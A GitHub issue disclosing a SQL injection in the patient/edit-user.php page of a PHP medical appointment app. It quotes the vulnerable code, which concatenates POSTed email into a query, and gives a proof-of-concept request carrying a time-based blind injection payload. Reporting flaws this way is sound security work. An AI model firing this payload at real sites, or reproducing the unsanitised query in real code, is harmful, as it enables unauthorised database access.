Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Found a vulnerability #19

Open
0clickjacking0 opened this issue Aug 6, 2022 · 0 comments
Open

Found a vulnerability #19

0clickjacking0 opened this issue Aug 6, 2022 · 0 comments
Labels
sql-injection

Comments

@0clickjacking0
Copy link

Vulnerability file address

patient/edit-user.php from line 11,The $email parameter is controllable, the parameter email can be passed through post, and the $email is not protected from sql injection, line 27 $result= $database->query($aab); causes sql injection

......
......
......
  if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $oldemail=$_POST["oldemail"];
        $address=$_POST['address'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];
        $id=$_POST['id00'];
        
        if ($password==$cpassword){
            $error='3';
            $aab="select patient.pid from patient inner join webuser on patient.pemail=webuser.email where webuser.email='$email';";
            $result= $database->query($aab);
            //$resultqq= $database->query("select * from doctor where docid='$id';");
            if($result->num_rows==1){
                $id2=$result->fetch_assoc()["pid"];
......
......
......

POC

POST /patient/edit-user.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

email=' AND (SELECT 9021 FROM (SELECT(SLEEP(5)))BPzc)-- aeMt&password=1&cpassword=1

Attack results pictures

image-20220805233806265
theunknownsky added a commit to amiel-danao/veterinary-appointment-system that referenced this issue Jul 17, 2023
@theunknownsky
partial HashenUdara#19
c864bf3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
sql-injection
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@0clickjacking0 @HashenUdara